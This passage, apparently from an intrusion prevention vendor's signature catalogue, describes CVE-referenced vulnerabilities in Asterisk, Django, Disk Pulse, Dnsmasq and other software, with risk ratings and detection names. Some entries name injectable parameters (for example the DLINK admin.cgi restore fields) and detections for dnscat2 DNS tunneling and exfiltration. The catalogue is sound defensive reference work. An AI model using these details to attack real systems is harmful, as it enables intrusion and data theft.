First detected in: sgpkg-ips-452-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Digium Asterisk. The vulnerability is due to a bounds checking error while handling KEYPAD_BUTTON_MESSAGE events in the Skinny channel driver. The vulnerable code does not check the number of these messages and can write past the end of a heap buffer allocated for them. A remote attacker can exploit this vulnerability to overflow the buffer and execute arbitrary code on the vulnerable system. If code execution is unsuccessful, this can lead to a denial of service condition.
Situation: Generic_CS-Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow
References:
CVE-2012-2415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2415
OSVDB-81455
http://www.osvdb.org/81455
Back to top

Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference

About this vulnerability: A Digium Asterisk Skinny Channel Null-Pointer Dereference vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Null Pointer Dereference
Description: A vulnerability in Digium Asterisk which allows remote attackers to cause a denial of service condition by closing a connection to the Asterisk server in certain call states, due to incorrect handling of a closed client connection in the SCCP channel driver.
Situation: Generic_CS-Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference
References:
CVE-2012-2948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2948
Back to top

Digium-Asterisk-Tls-Certificate-Common-Name-Null-Byte-Input-Validation-Error

About this vulnerability: A vulnerability in Asterisk Open Source
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: A policy bypass vulnerability exists in Digium Asterisk. The vulnerability is due to incorrectly validating the common name in a certificate. It can be exploited by using a NULL character after the portion of the common name that Asterisk expects. By exploiting this vulnerability, a remote attacker can conduct variety of attacks including man-in-the-middle.
Situation: HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error
References:
CVE-2015-3008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3008
OSVDB-120492
http://www.osvdb.org/120492
Back to top

Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: High
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk Open Source; Digium Certified Asterisk
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in Digium Asterisk. The vulnerability is due to improper handling of RTP packets with unnegotiated Payload Types. A remote attacker could exploit this vulnerability by sending crafted RTP packets to the target server. Successful exploitation results in denial-of-service conditions on the target service.
Situation: Generic_UDP-Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service
References:
CVE-2018-7285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7285
Back to top

Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk Open Source
Type: Input Validation
Description: There has been reported a denial-of-service vulnerability in Digium Asterisk. Successful exploitation could result in denial-of-service condition.
Situation: HTTP_CS-Digium-Asterisk-WebSocket-Frame-Empty-Payload-Denial-Of-Service
WebSocket_CS-Zero-Payload
References:
CVE-2018-7287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7287
Back to top

Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service

About this vulnerability: A vulnerability in multiple Asterisk products
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Resource Starvation
Description: The IAX2 channel driver (chan_iax2) in Asterisk before 1.2.22 and 1.4.x before 1.4.8, Business Edition before B.2.2.1, AsteriskNOW before beta7, Appliance Developer Kit before 0.5.0, and s800i before 1.0.2 allows remote attackers to cause a denial of service (crash) via a crafted (1) LAGRQ or (2) LAGRP frame that contains information elements of IAX frames, which results in a NULL pointer dereference when Asterisk does not properly set an associated variable.
Situation: Generic_UDP-Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service
References:
CVE-2007-3763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3763
BID-24950
http://www.securityfocus.com/bid/24950
Back to top

Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service

About this vulnerability: A denial of service vulnerability in Digium Asterisk
Risk: High
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: There is a denial of service vulnerability in multiple Asterisk products. The vulnerability is due to a segfault in Skinny Channel Driver when Asterisk receives a packet where the claimed length of the data is between 0 and 3, followed by a packet of length of 4 or more bytes. Remote unauthenticated attackers could exploit this vulnerability using specially crafted packets. Successful exploitation would result in a denial of service condition.
Situation: Generic_CS-Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service
References:
CVE-2007-3764
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3764
BID-24950
http://www.securityfocus.com/bid/24950
Back to top

Digmine-Cryptocurrency-Miner

About this vulnerability: Digmine Cryptocurrency Miner
Risk: High
First detected in: sgpkg-ips-1027-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Digmine is a cryptocurrency miner, which uses target's computer to mine cryptocurrency.
Situation: HTTP_CSH-Digmine-Cryptocurrency-Miner
Back to top

DirectConnect-ConnectToMe-DOS

About this vulnerability: A denial of service attack using Direct Connect client-to-client handshakes
Risk: Moderate
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Resource Starvation
Description: Certain Direct Connect hubs can be used to cause DDOS attacks by instructing connected Direct Connect clients to connect to a given ip/port pair. With large hubs that have a large number number of clients connected, this can be used to launch DDOS attacks against selected hosts.
Situation: DNS-TCP_DirectConnect-Client-To-Client-Handshake
HTTP_CS-DirectConnect-Client-To-Client-Handshake
SMTP_DirectConnect-Client-To-Client-Handshake
Back to top

DirectConnect-Peer-To-Peer-Network-Usage

About this vulnerability: DirectConnect Peer-to-Peer Network usage
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DirectConnect
Type: Peer-to-Peer
Description: DirectConnect is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation: P2P-TCP_DirectConnect-Key
P2P-TCP_DirectConnect-Lock
Back to top

Directory-Pro-Directory-Traversal

About this vulnerability: Cosmicperl Directory Pro 2.0 directory traversal file disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Directory Pro
Type: Directory Traversal
Description: Cosmicperl Directory Pro 2.0 has a file disclosure vulnerability that can allow the attacker to view arbitrary files on the system. The problem is in insufficient input validation of the 'show' parameter for the directorypro.cgi script, allowing the attacker to step out of the Web server context and view files with arbitrary extensions.
References:
CVE-2001-0780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0780
BID-2793
http://www.securityfocus.com/bid/2793
Back to top

Directory-Traversal

About this vulnerability: Directory traversal detected
Risk: High
First detected in: sgpkg-ips-447-4219
Last changed: sgpkg-ips-1769-5242
Platform: Generic
Software: Any Software
Type: Malfunction
Description: Directory traversal, such as "../", has been detected. This may be an attempt to access a file on the server that is not intented to be accessible.
Situation: HTTP_CSU-Windows-Style-Absolute-Path-In-URI
HTTP_CSU-Suspected-Dot-Dot-Slash-Directory-Traversal
HTTP_CSU-Dotdotdot-Directory-Traversal
HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence
HTTP_CSH-Windows-Style-Absolute-Path-In-Referer-Header
HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal
Back to top

Directory-Traversal-In-Archive-Filename

About this vulnerability: A vulnerability in Schneider Electric IIoT Monitor
Risk: Moderate
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Directory Traversal
Description: A file name containing a directory traversal attempt ".." was seen. This may be used to exploit various vulnerabilities in different implementations of zip decompressors.
Situation: File-Zip_Directory-Traversal-In-Archive-Filename
References:
CVE-2018-7836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7836
Back to top

Disk-Pulse-Enterprise-GET-Buffer-Overflow

About this vulnerability: A Disk Pulse Enterprise GET Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Disk Pulse
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Disk Pulse Enterprise 9.9.16 which allows remote attackers to execute a payload in the Authority/System context by sending a crafted HTTP GET request.
Situation: HTTP_CSU-Disk-Pulse-Enterprise-GET-Buffer-Overflow
Back to top

Disk-Pulse-Enterprise-Server-Cleint-Compnent-XML-Buffer-Overflow

About this vulnerability: An attempt to exploit a Disk Pulse Enterprise Server Client Component XML Buffer Overflow vulnerability detected
Risk: High
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Disk Pulse
Type: Buffer Overflow
Description: A buffer overflow vulnerability in DiskPulse Enterprise Server which allows remote attackers to execute arbitrary code via a malicious XML file due to improper bounds checking when importing commands.
Situation: File-TextId_Disk-Pulse-Enterprise-Server-Client-Component-XML-Buffer-Overflow
Back to top

Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow

About this vulnerability: A Disk Pulse Enterprise Server Login Request Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Disk Pulse
Type: Buffer Overflow
Description: A buffer overvlow vulnerability in Disk Pulse Enterprise Server, version 9.0.34, which allows remote attackers to execute arbitrary code due to the lack of proper bounds checking in the credential parameters.
Situation: HTTP_CRL-Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow
Back to top

Disk-Savvy-Enterprise-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Disk Savvy Enterprise
Risk: High
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DiskSavvy
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Disk Savvy Enterprise, version 10.4.18, which allows remote attackers to execute arbitrary code due to the improper bounds checking of the request sent to the built-in server.
Situation: Generic_CS-Disk-Savvy-Enterprise-Stack-Buffer-Overflow
Back to top

distcc-Remote-Shell-Execution

About this vulnerability: A vulnerability in distcc
Risk: High
First detected in: sgpkg-ips-309-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: distcc
Type: Configuration Error
Description: distcc is a system that allows distribution of compilation tasks over the network. By design, it allows execution of arbitatry commands from remote systems. When not configured correctly, it may allow unauthorized command execution.
Situation: Generic_CS-distcc-Remote-Shell-Execution
References:
CVE-2004-2687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
OSVDB-13378
http://www.osvdb.org/13378
Back to top

Distinct-TFTP-Directory-Traversal

About this vulnerability: A Distinct TFTP Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Distinct
Type: Directory Traversal
Description: A directory traversal vulnerability in Distinct TFTP 3.10 that allows remote attackers to write and execute arbitrary files, which results in code execution under the context of System.
Situation: TFTP_Distinct-TFTP-Directory-Traversal
References:
CVE-2012-6664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6664
OSVDB-80984
http://www.osvdb.org/80984
Back to top

DivX-ActiveX-Browser-Plugin-Denial-of-Service

About this vulnerability: A vulnerability in DivX Browser Plugin
Risk: High
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DivX Browser Plugin
Type: Input Validation
Description: There is a denial of service flaw in DivX Browser Plugin.
Situation: File-Text_DivX-ActiveX-Browser-Plugin-Denial-of-Service
References:
CVE-2007-0429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0429
BID-22133
http://www.securityfocus.com/bid/22133
OSVDB-37693
http://www.osvdb.org/37693
Back to top

DivX-Player-Subtitle-Parsing-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in DivX Player
Risk: High
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DivX Player
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in DivX Player. A remote attacker can exploit this vulnerability by persuading a user to open a malicious subtitles file with a vulnerable version of DivX Player. Successful exploitation could allow the attacker to execute arbitrary code.
Situation: Shared_SS-DivX-Player-Subtitle-Parsing-Buffer-Overflow
File-Text_DivX-Player-Subtitle-Parsing-Buffer-Overflow
References:
CVE-2008-1912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1912
BID-28799
http://www.securityfocus.com/bid/28799
OSVDB-44402
http://www.osvdb.org/44402
Back to top

DJ-Studio-Pro-Stack-Buffer-Overflow

About this vulnerability: A DJ Studio Pro Stack Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-801-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DJ Studio Pro
Type: Buffer Overflow
Description: A buffer overflow vulnerability in DJ Studio Pro version 5.1.6.5.2, and related products Audiotran version 1.4.1 and Audio Workstation version 6.4.2.4.3, that allows remote attackers to execute arbitrary code via a long string in a playlist file.
References:
CVE-2009-4656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4656
OSVDB-58159
http://www.osvdb.org/58159
Back to top

Django-Get_Supported_Language_Variant-Denial-Of-Service

About this vulnerability: A vulnerability in Django Software Foundation Django
Risk: Moderate
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Platform: Generic
Software: Django
Type: Input Validation
Description: Improper input validation in the get_supported_language_variant method causes a vulnerability in Django. A successful exploitation allows an attacker to cause a denial of service condition on the target system.
Situation: HTTP_CSH-Django-Get_Supported_Language_Variant-Denial-Of-Service
References:
CVE-2024-39614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39614
Back to top

Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402

About this vulnerability: A vulnerability in Django
Risk: High
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Platform: Generic
Software: Django
Type: SQL Injection
Description: A SQL injection vulnerability exists in Django versions 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4. A remote attacker can use this vulnerability to execute arbitrary SQL queries by passing a specifically crafted tolerance parameter to GIS functions and aggregates on Oracle.
Situation: HTTP_CSU-Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402
References:
CVE-2020-9402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9402
Back to top

Django-Multipartparser-Infinite-Loop-DoS

About this vulnerability: A vulnerability in the HTTP multipart parser of Django.
Risk: High
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1460-5242
Platform: Linux; Unix
Software: Django
Type: Infinite Loop
Description: A vulnerability in the the HTTP multipart parser of Django, versions prior to 2.2.27, prior to 3.2.12, prior to 4.0.2, which allow remote attackers to cause a denial of service condition by sending a crafted multipart HTTP request to the target server, due to improper validation of multipart requests.
Situation: Generic_CS-Django-Multipartparser-Infinite-Loop-DoS
References:
CVE-2022-23833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23833
Back to top

Django-Multipartparser.py-Parse-Denial-Of-Service

About this vulnerability: A vulnerability in Django Software Foundation Django
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: Django
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in the Django web framework. The vulnerability is due to resource exhaustion when parsing a large number of files in multipart/form-data requests. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in denial of service conditions on the target server.
Situation: HTTP_CS-Django-Multipartparser.py-Parse-Denial-Of-Service
References:
CVE-2023-24580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24580
Back to top

Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion

About this vulnerability: A vulnerability in Django Software Foundation Django
Risk: High
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: Django
Type: Resource Starvation
Description: A denial of service vulnerability has been reported for Django. This vulnerability is due to resource exhaustion when handling the Accept-Language header. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: HTTP_CSH-Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion
References:
CVE-2023-23969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23969
Back to top

Django-QuerySet-Order_By-SQL-Injection

About this vulnerability: A vulnerability in Django
Risk: Moderate
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Platform: Generic
Software: Django
Type: Input Validation
Description: Improper input validation in the order_by function causes an SQL injection vulnerability in Django. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Django-QuerySet-Order_By-SQL-Injection
References:
CVE-2021-35042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35042
Back to top

Django-Trunc-And-Extract-SQL-Injection

About this vulnerability: A vulnerability in Django Software Foundation Django
Risk: Moderate
First detected in: sgpkg-ips-1489-5242
Last changed: sgpkg-ips-1489-5242
Platform: Generic
Software: Django
Type: Input Validation
Description: Insufficient sanitization of user input to kind and lookup_name parameter passed to the Trunc and Extract database functions causes an SQL injection vulnerability in Django. A successful attack allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Django-Trunc-And-Extract-SQL-Injection
References:
CVE-2022-34265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34265
Back to top

Django-Urlize-Urlizetrunc-Denial-Of-Service

About this vulnerability: A vulnerability in Django Software Foundation Django
Risk: Moderate
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Generic
Software: Django
Type: Input Validation
Description: Improper input validation in the urlize and urlizetrunc filters causes a denial of service vulnerability in Django.
Situation: HTTP_CRL-Django-Urlize-Urlizetrunc-Denial-Of-Service
References:
CVE-2024-45230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45230
Back to top

Django-Usernamefield-Denial-Of-Service

About this vulnerability: A vulnerability in Django
Risk: Moderate
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Platform: Generic
Software: Django
Type: Malfunction
Description: Slow NFKC normalization of the UsernameField value on Windows causes a denial of service vulnerability in Django.
Situation: HTTP_CRL-Django-Usernamefield-Denial-Of-Service
References:
CVE-2023-46695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46695
Back to top

Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699

About this vulnerability: A vulnerability in Django Software Foundation Django
Risk: Moderate
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Platform: Generic
Software: Django
Type: Input Validation
Description: Improper input validation in the wordwrap filter causes a denial of service vulnerability in Django.
Situation: HTTP_CRL-Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699
References:
CVE-2025-26699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26699
Back to top

DjVu-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in DjVu ActiveX Control for Microsoft Office
Risk: High
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DjVu ActiveX Control for Microsoft Office
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in DjVu ActiveX control for Microsoft Office. DjVu is a digital document format. The ActiveX control contains a buffer overflow in a specific method which may allow arbitary code execution in the context of the current user.
Situation: HTTP_SS-DjVu-ActiveX-Control-Buffer-Overflow
File-Text_DjVu-ActiveX-Control-Buffer-Overflow
References:
BID-31987
http://www.securityfocus.com/bid/31987
Back to top

DLINK-DWL-2600-Authenticated-RCI

About this vulnerability: A vulnerability in DLINK DWL-2600
Risk: High
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Linux
Software: DLINK DWL-2600
Type: Input Validation
Description: There exists a vulnerability in DLINK DWL-2600, firmware version 4.2.0.15 Rev A, which allows remote attackers to execute arbitrary system commands through the configRestore and configServerip parameters in a POST to admin.cgi?action=config_restore, due to the lack of user input validation.
Situation: HTTP_CS-DLINK-DWL-2600-Authenticated-RCI
References:
CVE-2019-20499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20499
Back to top

DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Windows.
Situation: File-OLE_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-RTF_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-TextId_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
File-Text_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
References:
CVE-2016-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0041
MS16-014
http://technet.microsoft.com/security/bulletin/MS16-014
Back to top

DLL-Planting-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Windows. The vulnerability is due to a design weakness when loading certain DLL files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted file from certain locations. Successful exploitation could result in arbitrary code execution in the security context of the target user.
Situation: File-Binary_DLL-Planting-Remote-Code-Execution-Vulnerability
References:
CVE-2015-0096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0096
OSVDB-66387
http://www.osvdb.org/66387
MS15-020
http://technet.microsoft.com/security/bulletin/MS15-020
Back to top

dnaLIMS-Admin-Module-Command-Execution

About this vulnerability: An attempt to exploit a dnaLIMS Admin Module Command Execution vulnerability detected
Risk: High
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux;Unix
Software: dnaLIMS
Type: Code Injection
Description: A vulnerability in dnaLIMS which allows remote attackers to execute commands via the administrative module.
Situation: HTTP_CRL-dnaLIMS-Admin-Module-Command-Execution
References:
CVE-2017-6526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6526
Back to top

dnaLIMS-Directory-Traversal

About this vulnerability: A dnaLIMS Directory Traversal vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: dnaLIMS
Type: Input Validation
Description: A vulnerability in dnaLIMS which allows remote attackers to perform a directory traversal in the 'secID' parameter.
Situation: HTTP_CRL-dnaLIMS-Directory-Traversal
References:
CVE-2017-6527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6527
BID-96823
http://www.securityfocus.com/bid/96823
Back to top

DNS-NAPTR-Potential-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft DNS Server
Risk: Moderate
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability exists in the Microsoft DNS server component of server versions of the Microsoft Windows Operating System. The vulnerability is due to an improper sign extension when processing NAPTR Resource Records. Remote unauthenticated attackers could leverage this vulnerability by registering a domain, creating a specially crafted NAPTR entry, and sending (possibly via enticement) a DNS query to the target DNS server. Successful exploitation could allow an attacker to execute arbitrary code on the DNS server. Unsuccessful code execution attempts could terminate the DNS server process, leading to a denial-of-service condition.
Situation: DNS-UDP_Microsoft-Windows2k8-NAPTR-RCE
References:
CVE-2011-1966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1966
MS11-058
http://technet.microsoft.com/security/bulletin/MS11-058
Back to top

DNS-Out-Of-State-DNS-Response-With-Additional-Record

About this vulnerability: Out of state DNS response with one or more additional records, not vulnerability.
Risk: Low
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This is not a vulnerability. It is used in a Correlation to detect a large number of out of state (with no DNS request seen) consecutive DNS responses with one or more additional records to detect DNS cache poisoning attempts.
Situation: Generic_UDP-Out-Of-State-DNS-Response-With-Additional-Record
DNS-UDP_Out-Of-State-DNS-Response-With-Additional-Record
Back to top

DNS-Query-Containing-Base64-Encoded-Data

About this vulnerability: A DNS query containing base64-encoded data detected
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: Any Software
Type: Backdoor
Description: This fingerprint detects DNS queries that contain base64 encoded data. They are usually seen in DNS tunneling techniques, in which malicious actors utilize the DNS protocol to create covert channels from inside company networks to their servers. Instead of using DNS requests and responses to perform legitimate lookups, the actors use them to implement a Command & Control (C2) channel or exfiltrate stolen data.
Situation: DNS-UDP_DNS-Query-Containing-Base64-Encoded-Data
Back to top

DNS-Zone-Transfer

About this vulnerability: DNS Zone Transfer
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic DNS server
Type: Misconfiguration
Description: Zone Transfer is an operation where remote client downloads all available information for some zone. Zone transfers occur often in attack preparation phase, but they have also legitimate use.
Situation: DNS_Transfer-Request
References:
CVE-1999-0532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0532
Back to top

dnscat2-DNS-Tunnel-Usage

About this vulnerability: An attempt to use dnscat2 DNS tunneling software
Risk: High
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: dnscat2 is designed to create an encrypted tunnel over DNS protocol to evade network restrictions.
Situation: DNS-UDP_dnscat2-DNS-Tunnel-Usage
Back to top

Dnsmasq-Dhcpv6-Information-Disclosure

About this vulnerability: A vulnerability in DNSmasq/Mikrotik DNSmasq
Risk: Moderate
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dnsmasq
Type: Malfunction
Description: Insufficient validation of client-sent DHCPv6 messages causes a vulnerability in DNSmasq. A successful exploit may allow an attacker to access information on the server without authentication.
Situation: Generic_UDP-Dnsmasq-Dhcpv6-Information-Disclosure
References:
CVE-2017-14494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14494
Back to top

Dnsmasq-Dhcpv6-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in DNSmasq/Mikrotik DNSmasq
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dnsmasq
Type: Buffer Overflow
Description: Insufficient validation of DHCPv6 requests causes a buffer overflow vulnerability in DNSmasq. A successful exploit allows an attacker to run arbitrary code on the target system without authentication.
Situation: Generic_UDP-Dnsmasq-Dhcpv6-Stack-Buffer-Overflow
References:
CVE-2017-14493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14493
Back to top

Dnsmasq-extract_Name-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Dnsmasq.
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: Dnsmasq
Type: Malfunction
Description: A vulnerability in Dnsmasq, versions bfore 2.83, which allows remote attackers to execute arbitrary code by sending specially crafted DNS replies to a target server, do to an out-of-bounds write in the extract_name() function.
Situation: DNS-UDP_Dnsmasq-extract_Name-Out-Of-Bounds-Write
References:
CVE-2020-25682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25682
Back to top

Dnsmasq-ICMP6_Packet-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in DNSmasq/Mikrotik DNSmasq
Risk: Moderate
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dnsmasq
Type: Buffer Overflow
Description: Improper handling of ICMP6 router solicitation messages vauses a buffer overflow in dnsmasq. A successful exploit allows an attacker to execute arbitrary code with root privileges.
Situation: IPv6_Dnsmasq-ICMP6_Packet-Heap-Buffer-Overflow
References:
CVE-2017-14492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14492
Back to top

Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Dnsmasq.
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: Dnsmasq
Type: Malfunction
Description: A vulnerability in Dnsmasq, versions bfore 2.83, which allows remote attackers to execute arbitrary code by sending specially crafted DNS replies to a target server, do to an out-of-bounds write in the sort_rrset() function.
